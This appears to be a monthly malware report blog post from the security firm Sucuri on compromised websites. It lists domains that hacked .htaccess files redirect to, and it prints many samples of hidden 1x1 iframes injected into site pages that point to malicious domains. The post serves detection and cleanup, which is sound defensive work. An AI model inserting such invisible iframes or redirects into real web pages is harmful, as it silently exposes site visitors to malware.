For the month of August, things were very similar to the previous ones, with a slightly increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability.
If your site is currently compromised with malware or spam and you need help, sign up with us here: http://sucuri.net/signup. We will clean your site and get it off from Google’s blacklist.
.htaccess redirections
We are seeing many sites with their .htaccess hacked. It redirects their users to some Russian and Polish domains:http://softwareid.ru/zisec/index.php
http://breakingbad.osa.pl/
http://privacyyour.ru/xfast/index.php
http://activationsoftware.ru/turbom/index.php
http://distributioncorporate.ru/kloac/index.php
http://dgsdfhsdfh.osa.pl
http://now-protect.ru/accaunt/index.php
http://yourprivacy.ru/product/index.php
http://internet-safeness.ru/team/index.php
http://safenesscontent.ru/s4one/index.php
Malicious iframes
We are seeing many malicious iframes, specially from free domains (.cu.cc, .co.cc, etc). Also from some domains faking to be from google, like toolbarqueries-google.info, counter-google.com, counter-wordpress.com, etc:http://toolbarqueries-google.infoExamples of iframes:
http://whatwesave.cu.cc
http://bkmb.net/
http://gertalo8olw.c0m.li/forum.php?tp=134539292
http://dvotjtnc.co.tv/i.php?go=1
http://matreshka5.cx.cc/index.php?tp=38967d9a9d6df9e3
http://iframeshop.net/sti.php?id=123444
http://linkdock.com/content.php
http://sockscape.gv.vg/showthread.php?t=50170030
http://sommerandengelhart.com/genall.cgi
<iframe src="http://prettyrosseande.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
<iframe src="http://bastalevarrga.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
<iframe src="http://bastalevarrga.us.to/kwizhveo.php" width="1" height="1" frameborder="0">
<iframe src="http://fzwbwwvft.co.tv/i.php?go=1" width="1" height="1"></iframe>
<iframe src="http://narmnqlahb.co.tv/i.php?go=1" width="3" height="3"></iframe>
<iframe src=’http://rynothedyno.gv.vg/showthread.php?t=20170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src="http://fwzlwke.co.tv/?go=1" width="1" height="1">
<iframe src=’http://hcirfiwcsmo.cu.cc/showthread.php?t=90170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://sandradohn.cu.cc/showthread.php?t=10170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://sail4kids.cu.cc/showthread.php?t=20170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://bagsbybetty.gv.vg/showthread.php?t=40170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://vkcomics.ka.hn/showthread.php?t=50170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://sincitycash.gv.vg/showthread.php?t=50170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src="http://ycnnfnw.co.tv/?go=1" width="1" height="1">
<iframe src=’http://digitalday.ka.hn/showthread.php?t=10170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://darcy4h.cu.cc/showthread.php?t=80170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://hipoteca049.gv.vg/showthread.php?t=20170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://lakotasales.cu.cc/showthread.php?t=90170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://topbeatech.ka.hn/showthread.php?t=30170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://change1life.gv.vg/showthread.php?t=90170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://mindsvision.ka.hn/showthread.php?t=70170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src="http://ellrcsh.co.tv/?go=1" width="1" height="1">
<iframe src=’http://myclubbonus.cu.cc/showthread.php?t=60170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe src=’http://indobatiks.cu.cc/showthread.php?t=40170030′ width=’1′ height=’1′ frameborder=’0′ >
<iframe frameborder=0 height=1 width=1 scrolling=no src="http://bkmb.net/"..
And many more.. Those are just some samples. If you think your site might be compromised, scan it on our scanner: http://sitecheck.sucuri.net
